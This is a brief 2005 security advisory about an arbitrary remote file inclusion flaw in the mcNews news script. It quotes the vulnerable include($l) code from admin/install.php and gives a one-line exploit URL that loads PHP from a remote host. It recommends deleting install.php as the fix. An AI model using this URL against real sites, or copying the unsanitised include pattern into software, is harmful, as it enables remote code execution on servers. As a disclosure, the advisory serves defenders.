PHP mcNews arbitrary file inclusion
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
BadRoot Security Advisory 2005-#0x01
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Thu Mar 17 2005 - 00:46 am GMT +1
Product: mcNews <=1.3 (successfully exploited on 1.3)
Vendor: http://www.phpforums.net/index.php?dir=dld (Home Page)
Type: Arbitrary file inclusion
Author: Jonathan Whiteley (Vukodlak)
Product description:
-----------------------------------
A News Management script.
Vulnerable code:
-----------------------------------
--> admin/install.php
...
33 if ($table==1)
34 {
35 include($l);
36 echo '<a href="index.php">'.$lGoAdmin.'</a>';
37 }
...
Impact:
-----------------------------------
Anyone can inject PHP code by calling:
http://vuln-host.com/path/to/mcnews/admin/install.php?l=http://some.php/source
Solution:
-----------------------------------
Remove install.php, it's futile after first installation.
Contact:
-----------------------------------
IRC: irc.us.azzurra.org - #badroot - Vukodlak
E-Mail: jon.whiteley@xxxxxxxxx
HP: http://www.badroot.org
Cheers
PS: Thanks to Arak for aid ;)